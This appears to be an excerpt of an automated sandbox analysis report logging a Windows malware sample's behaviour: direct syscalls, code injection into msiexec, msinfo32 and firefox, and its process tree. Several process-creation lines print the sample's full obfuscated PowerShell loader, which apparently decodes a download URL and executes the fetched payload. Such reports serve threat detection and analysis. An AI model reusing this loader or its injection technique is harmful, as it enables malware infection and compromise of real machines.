          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeNtClose: Direct from: 0x76F02B6C
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe protection: execute and read and writeJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeSection loaded: NULL target: C:\Windows\SysWOW64\msinfo32.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: NULL target: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: NULL target: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\SysWOW64\msinfo32.exeThread register set: target process: 6892Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
          Writes to foreign memory regions
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 2C80000Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping 6777.6777.6777.677eJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Lediggang Graadighedens Disciplineringer Bagermestrene Teutonisk Uptilt #>;$Spegeplserne='Nymaledes';<#Messiness Compromising Anaphalis Gennemarbejdelsen Fodervikkerne #>;$Laparotomize140=$host.'PrivateData';If ($Laparotomize140) {$Trikotagefabrikker++;}function Spdbarnsplejerens($Ledningernes){$Annelism=$Totlafholdenhed61+$Ledningernes.Length-$Trikotagefabrikker; for( $Omgik=7;$Omgik -lt $Annelism;$Omgik+=8){$Methodisers='Exuscitate';$Protaspis+=$Ledningernes[$Omgik];$Newsroom204='Dkfjers';}$Protaspis;}function Optllingslister($baulky){ & ($Unark) ($baulky);}$Steamboating=Spdbarnsplejerens 'MouthfuMDecollaoUarb,jdzRaabaaniUdf ldelundertilAntipreaNebra.k/Averrab5stedbrd.Faglrer0 Ful,vr Blottel(Porch dWB taliniAfgangsnRati,nedPopuliso Ove clwAllokatsBegnawn HjertebN Kal etTTempl r Materia1Haunche0Waylanr. instit0Gri tmi;Departe c araciW,uccubei.aftkjonandest 6Eardro 4 Increa; Delege Finansrx Uterom6 mysti 4Fgtmedd;a,reste barramurMacroptvKonvolu:Re ligh1 Graph 2Argenti1Delubru.Apace a0Bebutto)Lystbaa unquietG Spelmae TwelfhcAttak ekSkamrdmoQuantis/Persona2Hemidom0Noggkas1 Nonchr0,anebry0Jaszmal1Futu is0Ud lugt1 Arquat BararmFLikenesiQuizzysrIchthyoeLuncherfOzoniz.oRaastofx.hefmgl/Gra,bea1Aym sar2 Fje,ne1.ongrat.Andelss0No merc ';$Railcard=Spdbarnsplejerens 'syltdepuSoapfissdkningsESvartidRRidning- Er,rinA PainkigOverophE GustinN NegatiTForkerk ';$Ekspatrieret=Spdbarnsplejerens 'Bille thG,ilingtThrenodtBibliotpNonevilsSkydere:Evangel/ mpetu/ Fili,tp DatostuSpecialb Blomme-Tremour2pladshof Achi l7Nipsetsd Quater0 upersu7gagered1Vgtford5 Repr.f3,nakepreGreeneraHousefl1ev kost4 B.odsp0Moduler3Ansamle1Jengene8Sockhea4 leopardStengun6Bioscie2Tonikum2U,ifiab6Skammel6Litigatd Ind kr9unperv.cAfisnin2Regiona8theodraeAngolan4S hoolb1 Thelyt. StavnsrTeleotr2T pefli.drmmebid ConspieMicrotovTopchef/UdlistnnTaagetmePennyspdDr gbolkRiddersoTrvlerng KrgendeRecan.e. betacim Kruspes DeadmeoHusass ';$Overrigidness=Spdbarnsplejerens 'Soapyre>Indsnus ';$Unark=Spdbarnsplejerens 'Terningi,vergeneSlank ixKaosets ';$Metaprescutum='Caddises';$Arkivskab='\Nationalsocialisternes.Ska';Optllingslister (Spdbarnsplejerens 'Uhjlpso$BepaidlgBetali lRea izaoDisser,bEspartoATyr fgtlKlderen:Cebid nm ogejome S ppreKPapembaa Oblig.NklinikliBankemaShaplontMo dsgnieFinlandRHenns.n= N.trog$ ego,seEPlasmasn.ultideVIllegit:Bu.kladApel,rgoPRakitispQuincyuD GuidebA antasiTThomisiAUnhands+wasabis$Racial,aN nsurgRUnmercekForsortiDolomitVAmn,monS Et,opikBulwarkAPungpebbBowkerb ');Optllingslister (Spdbarnsplejerens 'Excla,m$KronpriGOpvaskelStumbleO otulisB Forma,aSulfosrLDiscolo: NightiITendo.oNUnwiseqd Libra i BesselSpakhusetWindburi PneumoNE,rthwacAdaptivtAgranulNFlambeeESlingreSAnnot tsUdv elg= Orchit$UncapiteLinj,skKReflektsBleeralPEnta glAKannikkTBedstevRIagttagiSnotdumEnabofamrnostalgePara.phTAcrolog.Reak orSB listip pologeLRhipidoI esidenTDonnere(Hematoz$zenithwoRadiJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 6777.6777.6777.677eJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeProcess created: C:\Windows\SysWOW64\msinfo32.exe "C:\Windows\SysWOW64\msinfo32.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#lediggang graadighedens disciplineringer bagermestrene teutonisk uptilt #>;$spegeplserne='nymaledes';<#messiness compromising anaphalis gennemarbejdelsen fodervikkerne #>;$laparotomize140=$host.'privatedata';if ($laparotomize140) {$trikotagefabrikker++;}function spdbarnsplejerens($ledningernes){$annelism=$totlafholdenhed61+$ledningernes.length-$trikotagefabrikker; for( $omgik=7;$omgik -lt $annelism;$omgik+=8){$methodisers='exuscitate';$protaspis+=$ledningernes[$omgik];$newsroom204='dkfjers';}$protaspis;}function optllingslister($baulky){ & ($unark) ($baulky);}$steamboating=spdbarnsplejerens 'mouthfumdecollaouarb,jdzraabaaniudf ldelundertilantipreanebra.k/averrab5stedbrd.faglrer0 ful,vr blottel(porch dwb taliniafgangsnrati,nedpopuliso ove clwallokatsbegnawn hjertebn kal etttempl r materia1haunche0waylanr. instit0gri tmi;departe c araciw,uccubei.aftkjonandest 6eardro 4 increa; delege finansrx uterom6 mysti 4fgtmedd;a,reste barramurmacroptvkonvolu:re ligh1 graph 2argenti1delubru.apace a0bebutto)lystbaa unquietg spelmae twelfhcattak ekskamrdmoquantis/persona2hemidom0noggkas1 nonchr0,anebry0jaszmal1futu is0ud lugt1 arquat bararmflikenesiquizzysrichthyoeluncherfozoniz.oraastofx.hefmgl/gra,bea1aym sar2 fje,ne1.ongrat.andelss0no merc ';$railcard=spdbarnsplejerens 'syltdepusoapfissdkningsesvartidrridning- er,rina painkigoverophe gustinn negatitforkerk ';$ekspatrieret=spdbarnsplejerens 'bille thg,ilingtthrenodtbibliotpnonevilsskydere:evangel/ mpetu/ fili,tp datostuspecialb blomme-tremour2pladshof achi l7nipsetsd quater0 upersu7gagered1vgtford5 repr.f3,nakepregreenerahousefl1ev kost4 b.odsp0moduler3ansamle1jengene8sockhea4 leopardstengun6bioscie2tonikum2u,ifiab6skammel6litigatd ind kr9unperv.cafisnin2regiona8theodraeangolan4s hoolb1 thelyt. stavnsrteleotr2t pefli.drmmebid conspiemicrotovtopchef/udlistnntaagetmepennyspddr gbolkriddersotrvlerng krgenderecan.e. betacim kruspes deadmeohusass ';$overrigidness=spdbarnsplejerens 'soapyre>indsnus ';$unark=spdbarnsplejerens 'terningi,vergeneslank ixkaosets ';$metaprescutum='caddises';$arkivskab='\nationalsocialisternes.ska';optllingslister (spdbarnsplejerens 'uhjlpso$bepaidlgbetali lrea izaodisser,bespartoatyr fgtlklderen:cebid nm ogejome s pprekpapembaa oblig.nkliniklibankemashaplontmo dsgniefinlandrhenns.n= n.trog$ ego,seeplasmasn.ultidevillegit:bu.kladapel,rgoprakitispquincyud guideba antasitthomisiaunhands+wasabis$racial,an nsurgrunmercekforsortidolomitvamn,mons et,opikbulwarkapungpebbbowkerb ');optllingslister (spdbarnsplejerens 'excla,m$kronprigopvaskelstumbleo otulisb forma,asulfosrldiscolo: nightiitendo.onunwiseqd libra i besselspakhusetwindburi pneumone,rthwacadaptivtagranulnflambeeeslingresannot tsudv elg= orchit$uncapitelinj,skkreflektsbleeralpenta glakannikktbedstevriagttagisnotdumenabofamrnostalgepara.phtacrolog.reak orsb listip pologelrhipidoi esidentdonnere(hematoz$zenithworadi
          Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "<#lediggang graadighedens disciplineringer bagermestrene teutonisk uptilt #>;$spegeplserne='nymaledes';<#messiness compromising anaphalis gennemarbejdelsen fodervikkerne #>;$laparotomize140=$host.'privatedata';if ($laparotomize140) {$trikotagefabrikker++;}function spdbarnsplejerens($ledningernes){$annelism=$totlafholdenhed61+$ledningernes.length-$trikotagefabrikker; for( $omgik=7;$omgik -lt $annelism;$omgik+=8){$methodisers='exuscitate';$protaspis+=$ledningernes[$omgik];$newsroom204='dkfjers';}$protaspis;}function optllingslister($baulky){ & ($unark) ($baulky);}$steamboating=spdbarnsplejerens 'mouthfumdecollaouarb,jdzraabaaniudf ldelundertilantipreanebra.k/averrab5stedbrd.faglrer0 ful,vr blottel(porch dwb taliniafgangsnrati,nedpopuliso ove clwallokatsbegnawn hjertebn kal etttempl r materia1haunche0waylanr. instit0gri tmi;departe c araciw,uccubei.aftkjonandest 6eardro 4 increa; delege finansrx uterom6 mysti 4fgtmedd;a,reste barramurmacroptvkonvolu:re ligh1 graph 2argenti1delubru.apace a0bebutto)lystbaa unquietg spelmae twelfhcattak ekskamrdmoquantis/persona2hemidom0noggkas1 nonchr0,anebry0jaszmal1futu is0ud lugt1 arquat bararmflikenesiquizzysrichthyoeluncherfozoniz.oraastofx.hefmgl/gra,bea1aym sar2 fje,ne1.ongrat.andelss0no merc ';$railcard=spdbarnsplejerens 'syltdepusoapfissdkningsesvartidrridning- er,rina painkigoverophe gustinn negatitforkerk ';$ekspatrieret=spdbarnsplejerens 'bille thg,ilingtthrenodtbibliotpnonevilsskydere:evangel/ mpetu/ fili,tp datostuspecialb blomme-tremour2pladshof achi l7nipsetsd quater0 upersu7gagered1vgtford5 repr.f3,nakepregreenerahousefl1ev kost4 b.odsp0moduler3ansamle1jengene8sockhea4 leopardstengun6bioscie2tonikum2u,ifiab6skammel6litigatd ind kr9unperv.cafisnin2regiona8theodraeangolan4s hoolb1 thelyt. stavnsrteleotr2t pefli.drmmebid conspiemicrotovtopchef/udlistnntaagetmepennyspddr gbolkriddersotrvlerng krgenderecan.e. betacim kruspes deadmeohusass ';$overrigidness=spdbarnsplejerens 'soapyre>indsnus ';$unark=spdbarnsplejerens 'terningi,vergeneslank ixkaosets ';$metaprescutum='caddises';$arkivskab='\nationalsocialisternes.ska';optllingslister (spdbarnsplejerens 'uhjlpso$bepaidlgbetali lrea izaodisser,bespartoatyr fgtlklderen:cebid nm ogejome s pprekpapembaa oblig.nkliniklibankemashaplontmo dsgniefinlandrhenns.n= n.trog$ ego,seeplasmasn.ultidevillegit:bu.kladapel,rgoprakitispquincyud guideba antasitthomisiaunhands+wasabis$racial,an nsurgrunmercekforsortidolomitvamn,mons et,opikbulwarkapungpebbbowkerb ');optllingslister (spdbarnsplejerens 'excla,m$kronprigopvaskelstumbleo otulisb forma,asulfosrldiscolo: nightiitendo.onunwiseqd libra i besselspakhusetwindburi pneumone,rthwacadaptivtagranulnflambeeeslingresannot tsudv elg= orchit$uncapitelinj,skkreflektsbleeralpenta glakannikktbedstevriagttagisnotdumenabofamrnostalgepara.phtacrolog.reak orsb listip pologelrhipidoi esidentdonnere(hematoz$zenithworadi
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#lediggang graadighedens disciplineringer bagermestrene teutonisk uptilt #>;$spegeplserne='nymaledes';<#messiness compromising anaphalis gennemarbejdelsen fodervikkerne #>;$laparotomize140=$host.'privatedata';if ($laparotomize140) {$trikotagefabrikker++;}function spdbarnsplejerens($ledningernes){$annelism=$totlafholdenhed61+$ledningernes.length-$trikotagefabrikker; for( $omgik=7;$omgik -lt $annelism;$omgik+=8){$methodisers='exuscitate';$protaspis+=$ledningernes[$omgik];$newsroom204='dkfjers';}$protaspis;}function optllingslister($baulky){ & ($unark) ($baulky);}$steamboating=spdbarnsplejerens 'mouthfumdecollaouarb,jdzraabaaniudf ldelundertilantipreanebra.k/averrab5stedbrd.faglrer0 ful,vr blottel(porch dwb taliniafgangsnrati,nedpopuliso ove clwallokatsbegnawn hjertebn kal etttempl r materia1haunche0waylanr. instit0gri tmi;departe c araciw,uccubei.aftkjonandest 6eardro 4 increa; delege finansrx uterom6 mysti 4fgtmedd;a,reste barramurmacroptvkonvolu:re ligh1 graph 2argenti1delubru.apace a0bebutto)lystbaa unquietg spelmae twelfhcattak ekskamrdmoquantis/persona2hemidom0noggkas1 nonchr0,anebry0jaszmal1futu is0ud lugt1 arquat bararmflikenesiquizzysrichthyoeluncherfozoniz.oraastofx.hefmgl/gra,bea1aym sar2 fje,ne1.ongrat.andelss0no merc ';$railcard=spdbarnsplejerens 'syltdepusoapfissdkningsesvartidrridning- er,rina painkigoverophe gustinn negatitforkerk ';$ekspatrieret=spdbarnsplejerens 'bille thg,ilingtthrenodtbibliotpnonevilsskydere:evangel/ mpetu/ fili,tp datostuspecialb blomme-tremour2pladshof achi l7nipsetsd quater0 upersu7gagered1vgtford5 repr.f3,nakepregreenerahousefl1ev kost4 b.odsp0moduler3ansamle1jengene8sockhea4 leopardstengun6bioscie2tonikum2u,ifiab6skammel6litigatd ind kr9unperv.cafisnin2regiona8theodraeangolan4s hoolb1 thelyt. stavnsrteleotr2t pefli.drmmebid conspiemicrotovtopchef/udlistnntaagetmepennyspddr gbolkriddersotrvlerng krgenderecan.e. betacim kruspes deadmeohusass ';$overrigidness=spdbarnsplejerens 'soapyre>indsnus ';$unark=spdbarnsplejerens 'terningi,vergeneslank ixkaosets ';$metaprescutum='caddises';$arkivskab='\nationalsocialisternes.ska';optllingslister (spdbarnsplejerens 'uhjlpso$bepaidlgbetali lrea izaodisser,bespartoatyr fgtlklderen:cebid nm ogejome s pprekpapembaa oblig.nkliniklibankemashaplontmo dsgniefinlandrhenns.n= n.trog$ ego,seeplasmasn.ultidevillegit:bu.kladapel,rgoprakitispquincyud guideba antasitthomisiaunhands+wasabis$racial,an nsurgrunmercekforsortidolomitvamn,mons et,opikbulwarkapungpebbbowkerb ');optllingslister (spdbarnsplejerens 'excla,m$kronprigopvaskelstumbleo otulisb forma,asulfosrldiscolo: nightiitendo.onunwiseqd libra i besselspakhusetwindburi pneumone,rthwacadaptivtagranulnflambeeeslingresannot tsudv elg= orchit$uncapitelinj,skkreflektsbleeralpenta glakannikktbedstevriagttagisnotdumenabofamrnostalgepara.phtacrolog.reak orsb listip pologelrhipidoi esidentdonnere(hematoz$zenithworadiJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
